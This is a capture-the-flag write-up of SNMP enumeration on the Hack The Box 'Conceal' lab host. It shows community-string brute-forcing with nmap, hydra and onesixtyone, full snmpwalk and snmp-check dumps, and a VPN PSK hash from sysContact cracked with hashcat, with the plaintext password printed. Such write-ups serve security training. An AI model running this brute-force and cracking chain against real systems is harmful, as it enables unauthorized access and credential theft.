SNMP
From the Nmap scan reports, a SNMP server(agent) is running on the target port 161
It appears to be using the SNMP version 1 with the default community string; public
Additionally, Nmap reported all the NICs, processes and services present on the target host.
Community String
┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ sudo nmap -sU --script snmp-brute -p161 $IP
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-20 02:46 CET
Nmap scan report for 10.10.10.116
Host is up (0.033s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap done: 1 IP address (1 host up) scanned in 2.12 secondsNmap already did it as part of the simple script operation, but I can confirm the community string again by brute forcing it
┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt snmp://$IP
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-20 02:48:22
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3217 login tries (l:1/p:3217), ~202 tries per task
[DATA] attacking snmp://10.10.10.116:161/
[161][snmp] host: 10.10.10.116 password: public
[STATUS] attack finished for 10.10.10.116 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-20 02:48:22Hydra can also do this
┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt $IP/24
Scanning 256 hosts, 3219 communities
10.10.10.116 [public] Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)Another tool that I can use is onesixtyone, which is a specialized for mass SNMP scanning.
Notice the wildcard bit that I put after $IP variable
Enumeration
There are 2 notable tools when it comes to enumerating SNMP agents
the first one is snmpwalk, which is part of the net-snmp suite.
snmpwalk allows users to finely control the query. Users are able to query for a specific OID or MIB
the second one is snmp-check, which mainly focuses on general enumeration. snmp-check displays output in a much more user-friendlier manner compared to the first one.
snmpwalk
┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ snmpwalk -v 1 -c public $IP
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (2532619) 7:02:06.19
SNMPv2-MIB::sysContact.0 = STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
SNMPv2-MIB::sysName.0 = STRING: Conceal
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 76
IF-MIB::ifNumber.0 = INTEGER: 15
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifIndex.2 = INTEGER: 2
IF-MIB::ifIndex.3 = INTEGER: 3
IF-MIB::ifIndex.4 = INTEGER: 4
IF-MIB::ifIndex.5 = INTEGER: 5
IF-MIB::ifIndex.6 = INTEGER: 6
IF-MIB::ifIndex.7 = INTEGER: 7
IF-MIB::ifIndex.8 = INTEGER: 8
IF-MIB::ifIndex.9 = INTEGER: 9
IF-MIB::ifIndex.10 = INTEGER: 10
IF-MIB::ifIndex.11 = INTEGER: 11
IF-MIB::ifIndex.12 = INTEGER: 12
IF-MIB::ifIndex.13 = INTEGER: 13
IF-MIB::ifIndex.14 = INTEGER: 14
IF-MIB::ifIndex.15 = INTEGER: 15
IF-MIB::ifDescr.1 = STRING: Software Loopback Interface 1.
IF-MIB::ifDescr.2 = STRING: WAN Miniport (IKEv2).
IF-MIB::ifDescr.3 = STRING: WAN Miniport (PPTP).
IF-MIB::ifDescr.4 = STRING: Microsoft Kernel Debug Network Adapter.
IF-MIB::ifDescr.5 = STRING: WAN Miniport (L2TP).
IF-MIB::ifDescr.6 = STRING: Teredo Tunneling Pseudo-Interface.
IF-MIB::ifDescr.7 = STRING: WAN Miniport (IP).
IF-MIB::ifDescr.8 = STRING: WAN Miniport (SSTP).
IF-MIB::ifDescr.9 = STRING: WAN Miniport (IPv6).
IF-MIB::ifDescr.10 = STRING: WAN Miniport (PPPOE).
IF-MIB::ifDescr.11 = STRING: WAN Miniport (Network Monitor).
IF-MIB::ifDescr.12 = STRING: vmxnet3 Ethernet Adapter.
IF-MIB::ifDescr.13 = STRING: vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000.
IF-MIB::ifDescr.14 = STRING: vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000.
IF-MIB::ifDescr.15 = STRING: vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000.
IF-MIB::ifType.1 = INTEGER: softwareLoopback(24)
IF-MIB::ifType.2 = INTEGER: tunnel(131)
IF-MIB::ifType.3 = INTEGER: tunnel(131)
IF-MIB::ifType.4 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.5 = INTEGER: tunnel(131)
IF-MIB::ifType.6 = INTEGER: tunnel(131)
IF-MIB::ifType.7 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.8 = INTEGER: tunnel(131)
IF-MIB::ifType.9 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.10 = INTEGER: ppp(23)
IF-MIB::ifType.11 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.12 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.13 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.14 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.15 = INTEGER: ethernetCsmacd(6)
[...REDACTED...]As shown above, snmpwalk displays the output of the raw MIB data.
There is an interesting MIB, SNMPv2-MIB::sysContact.0
It contains has a string data instead of OID info
STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
It says that it is a password PSK hash for IKE VPN
Another thing to notice here is that the agent uses SNMP v2
I guess Nmap categorizes it under SNMP v1 since they both have the same weak security measure.
For Nmap, it’s either SNMPv1 or SNMPv3
snmp-check
┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ snmp-check -p 161 -c public -v 1 $IP
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'
[*] system information:
host ip address : 10.10.10.116
hostname : Conceal
description : Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
contact : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
location : -
uptime snmp : 06:56:58.96
uptime system : 06:56:46.17
system date : 2023-1-20 02:04:14.2
domain : WORKGROUP
[*] user accounts:
Guest
Destitute
Administrator
DefaultAccount
[*] network information:
ip forwarding enabled : no
default ttl : 128
tcp segments received : 177135
tcp segments sent : 8
tcp segments retrans : 4
input datagrams : 184288
delivered datagrams : 184257
output datagrams : 7109
[*] network interfaces:
interface : [ up ] Software Loopback Interface 1
id : 1
mac address : :::::
type : softwareLoopback
speed : 1073 Mbps
mtu : 1500
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (IKEv2)
id : 2
mac address : :::::
type : unknown
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (PPTP)
id : 3
mac address : :::::
type : unknown
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] Microsoft Kernel Debug Network Adapter
id : 4
mac address : :::::
type : ethernet-csmacd
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (L2TP)
id : 5
mac address : :::::
type : unknown
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] Teredo Tunneling Pseudo-Interface
id : 6
mac address : 00:00:00:00:00:00
type : unknown
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (IP)
id : 7
mac address : :::::
type : ethernet-csmacd
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (SSTP)
id : 8
mac address : :::::
type : unknown
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (IPv6)
id : 9
mac address : :::::
type : ethernet-csmacd
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (PPPOE)
id : 10
mac address : :::::
type : ppp
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ down ] WAN Miniport (Network Monitor)
id : 11
mac address : :::::
type : ethernet-csmacd
speed : 0 Mbps
mtu : 0
in octets : 0
out octets : 0
interface : [ up ] vmxnet3 Ethernet Adapter
id : 12
mac address : 00:50:56:b9:d5:79
type : ethernet-csmacd
speed : 4294 Mbps
mtu : 1500
in octets : 18057639
out octets : 670629
interface : [ up ] vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000
id : 13
mac address : 00:50:56:b9:d5:79
type : ethernet-csmacd
speed : 4294 Mbps
mtu : 1500
in octets : 18057639
out octets : 670629
interface : [ up ] vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000
id : 14
mac address : 00:50:56:b9:d5:79
type : ethernet-csmacd
speed : 4294 Mbps
mtu : 1500
in octets : 18057639
out octets : 670629
interface : [ up ] vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000
id : 15
mac address : 00:50:56:b9:d5:79
type : ethernet-csmacd
speed : 4294 Mbps
mtu : 1500
in octets : 18057639
out octets : 670629
[*] network ip:
Id IP Address Netmask Broadcast
12 10.10.10.116 255.255.255.0 1
1 127.0.0.1 255.0.0.0 1
[*] routing information:
Destination Next hop Mask Metric
0.0.0.0 10.10.10.2 0.0.0.0 271
10.10.10.0 10.10.10.116 255.255.255.0 271
10.10.10.116 10.10.10.116 255.255.255.255 271
10.10.10.255 10.10.10.116 255.255.255.255 271
127.0.0.0 127.0.0.1 255.0.0.0 331
127.0.0.1 127.0.0.1 255.255.255.255 331
127.255.255.255 127.0.0.1 255.255.255.255 331
224.0.0.0 127.0.0.1 240.0.0.0 331
255.255.255.255 127.0.0.1 255.255.255.255 331
[*] tcp connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49666 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49669 0.0.0.0 0 listen
0.0.0.0 49670 0.0.0.0 0 listen
10.10.10.116 139 0.0.0.0 0 listen
[*] listening udp ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 500
0.0.0.0 4500
0.0.0.0 5050
0.0.0.0 5353
0.0.0.0 5355
10.10.10.116 137
10.10.10.116 138
10.10.10.116 1900
10.10.10.116 49292
127.0.0.1 1900
127.0.0.1 49293
[*] network services:
Index Name
0 Power
1 Server
2 Themes
3 IP Helper
4 DNS Client
5 Data Usage
6 Superfetch
7 DHCP Client
8 Time Broker
9 TokenBroker
10 Workstation
11 SNMP Service
12 User Manager
13 VMware Tools
14 Windows Time
15 CoreMessaging
16 Plug and Play
17 Print Spooler
18 Windows Audio
19 SSDP Discovery
20 Task Scheduler
21 Windows Search
22 Security Center
23 Storage Service
24 Windows Firewall
25 CNG Key Isolation
26 COM+ Event System
27 Windows Event Log
28 IPsec Policy Agent
29 Geolocation Service
30 Group Policy Client
31 RPC Endpoint Mapper
32 Data Sharing Service
33 Device Setup Manager
34 Network List Service
35 System Events Broker
36 User Profile Service
37 Base Filtering Engine
38 Local Session Manager
39 Microsoft FTP Service
40 TCP/IP NetBIOS Helper
41 Cryptographic Services
42 Tile Data model server
43 COM+ System Application
44 Diagnostic Service Host
45 Shell Hardware Detection
46 State Repository Service
47 Diagnostic Policy Service
48 Network Connection Broker
49 Security Accounts Manager
50 Network Location Awareness
51 Windows Connection Manager
52 Windows Font Cache Service
53 Remote Procedure Call (RPC)
54 DCOM Server Process Launcher
55 Windows Audio Endpoint Builder
56 Application Host Helper Service
57 Network Store Interface Service
58 Distributed Link Tracking Client
59 System Event Notification Service
60 World Wide Web Publishing Service
61 Connected Devices Platform Service
62 Windows Defender Antivirus Service
63 Windows Management Instrumentation
64 Windows Process Activation Service
65 Distributed Transaction Coordinator
66 IKE and AuthIP IPsec Keying Modules
67 VMware CAF Management Agent Service
68 VMware Physical Disk Helper Service
69 Background Intelligent Transfer Service
70 Background Tasks Infrastructure Service
71 Program Compatibility Assistant Service
72 VMware Alias Manager and Ticket Service
73 Connected User Experiences and Telemetry
74 WinHTTP Web Proxy Auto-Discovery Service
75 Windows Defender Security Centre Service
76 Windows Push Notifications System Service
77 Windows Defender Antivirus Network Inspection Service
78 Windows Driver Foundation - User-mode Driver Framework
[*] processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
300 running smss.exe
316 running svchost.exe c:\Windows\System32\ -k LocalSystemNetworkRestricted
332 running svchost.exe c:\Windows\system32\ -k LocalService
336 running svchost.exe c:\Windows\system32\ -k LocalServiceNoNetwork
396 running csrss.exe
476 running wininit.exe
484 running csrss.exe
540 running winlogon.exe
620 running services.exe
628 running lsass.exe c:\Windows\system32\
716 running svchost.exe c:\Windows\system32\ -k DcomLaunch
736 running fontdrvhost.exe
744 running fontdrvhost.exe
756 running svchost.exe c:\Windows\system32\ -k LocalSystemNetworkRestricted
832 running svchost.exe c:\Windows\system32\ -k RPCSS
924 running dwm.exe
964 running svchost.exe c:\Windows\system32\ -k netsvcs
1012 running svchost.exe c:\Windows\System32\ -k LocalServiceNetworkRestricted
1064 running svchost.exe c:\Windows\System32\ -k NetworkService
1164 running vmacthlp.exe c:\Program Files\VMware\VMware Tools\
1180 running Memory Compression
1328 running svchost.exe c:\Windows\System32\ -k LocalServiceNetworkRestricted
1372 running svchost.exe c:\Windows\System32\ -k LocalServiceNetworkRestricted
1380 running svchost.exe c:\Windows\system32\ -k LocalServiceNetworkRestricted
1512 running spoolsv.exe c:\Windows\System32\
1632 running svchost.exe c:\Windows\system32\ -k appmodel
1748 running svchost.exe c:\Windows\system32\ -k apphost
1756 running svchost.exe c:\Windows\System32\ -k utcsvc
1784 running svchost.exe c:\Windows\system32\ -k ftpsvc
1852 running snmp.exe c:\Windows\System32\
1864 running SecurityHealthService.exe
1900 running vgauthservice.exe c:\Program Files\VMware\VMware Tools\VMware VGAuth\
1912 running vmtoolsd.exe c:\Program Files\VMware\VMware Tools\
1928 running managementagenthost.exe c:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\
1944 running svchost.exe c:\Windows\system32\ -k iissvcs
1956 running MsMpEng.exe
2352 running logonui.exe /flags:0x0 /state0:0xa3a28855 /state1:0x41c64e6d
2396 running searchfilterhost.exe c:\Windows\system32\ 0 692 696 704 8192 700
2556 running svchost.exe c:\Windows\system32\ -k NetworkServiceNetworkRestricted
2864 running wmiprvse.exe c:\Windows\system32\wbem\
2880 running searchindexer.exe c:\Windows\system32\ /Embedding
3064 running dllhost.exe c:\Windows\system32\ /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
3272 running NisSrv.exe
3472 running msdtc.exe c:\Windows\System32\
3584 running svchost.exe c:\Windows\system32\ -k LocalServiceAndNoImpersonation
5044 running searchprotocolhost.exe c:\Windows\system32\ Global\UsGthrFltPipeMssGthrPipe81_ Global\UsGthrCtrlFltPipeMssGthrPipe81 1 -2147483646 "Software\Microsoft\Windows Search" "Moz
[*] storage information:
description : ["C:\\ Label: Serial Number 91180ed"]
device id : [#<SNMP::Integer:0x00007fe4f1593660 @value=1>]
filesystem type : ["unknown"]
device unit : [#<SNMP::Integer:0x00007fe4f1591770 @value=4096>]
memory size : 14.51 GB
memory used : 10.09 GB
description : ["Virtual Memory"]
device id : [#<SNMP::Integer:0x00007fe4f1801aa0 @value=2>]
filesystem type : ["unknown"]
device unit : [#<SNMP::Integer:0x00007fe4f18179e0 @value=65536>]
memory size : 3.12 GB
memory used : 830.94 MB
description : ["Physical Memory"]
device id : [#<SNMP::Integer:0x00007fe4f18295c8 @value=3>]
filesystem type : ["unknown"]
device unit : [#<SNMP::Integer:0x00007fe4f1830990 @value=65536>]
memory size : 2.00 GB
memory used : 756.00 MB
[*] file system information:
index : 1
mount point :
remote mount point : -
access : 1
bootable : 0
[*] device information:
Id Type Status Descr
1 unknown running Microsoft XPS Document Writer v4
2 unknown running Microsoft Print To PDF
3 unknown running Microsoft Shared Fax Driver
4 unknown running Unknown Processor Type
5 unknown running Unknown Processor Type
6 unknown unknown Software Loopback Interface 1
7 unknown unknown WAN Miniport (IKEv2)
8 unknown unknown WAN Miniport (PPTP)
9 unknown unknown Microsoft Kernel Debug Network Adapter
10 unknown unknown WAN Miniport (L2TP)
11 unknown unknown Teredo Tunneling Pseudo-Interface
12 unknown unknown WAN Miniport (IP)
13 unknown unknown WAN Miniport (SSTP)
14 unknown unknown WAN Miniport (IPv6)
15 unknown unknown WAN Miniport (PPPOE)
16 unknown unknown WAN Miniport (Network Monitor)
17 unknown unknown vmxnet3 Ethernet Adapter
18 unknown unknown vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter
19 unknown unknown vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000
20 unknown unknown vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-
21 unknown running Fixed Disk
22 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
[*] software components:
Index Name
1 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
2 VMware Tools
3 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
[*] iis server information:
totalbytessentlowword : 0
totalbytesreceivedlowword : 0
totalfilessent : 0
currentanonymoususers : 0
currentnonanonymoususers : 0
totalanonymoususers : 0
totalnonanonymoususers : 0
maxanonymoususers : 0
maxnonanonymoususers : 0
currentconnections : 0
maxconnections : 0
connectionattempts : 0
logonattempts : 0
gets : 0
posts : 0
heads : 0
others : 0
cgirequests : 0
bgirequests : 0
notfounderrors : 0As shown above, snmp-check does the same enumeration, but displays output BETTER.
Although it doesn’t necessarily show the exact version like snmpwalk did back there, it’s nice to see all the enumerated MIB data re-structured for better viewing experience.
It also picked up the contact MIB
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ hashcat -a 0 -m 1000 hashes/psk /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
9c8b1a372b1878851be2c097031b6e43:Dudecake1!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 9c8b1a372b1878851be2c097031b6e43
Time.Started.....: Fri Jan 20 03:50:42 2023 (4 secs)
Time.Estimated...: Fri Jan 20 03:50:46 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2772.4 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11221248/14344385 (78.23%)
Rejected.........: 0/11221248 (0.00%)
Restore.Point....: 11220480/14344385 (78.22%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dupaszamana11 -> Ducky22BH
Hardware.Mon.#1..: Util: 40%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Fri Jan 20 03:50:29 2023
Stopped: Fri Jan 20 03:50:48 2023The password hash turn out to be a NTLM hash.
Hackcat was able to easily crack it
It’s Dudecake1!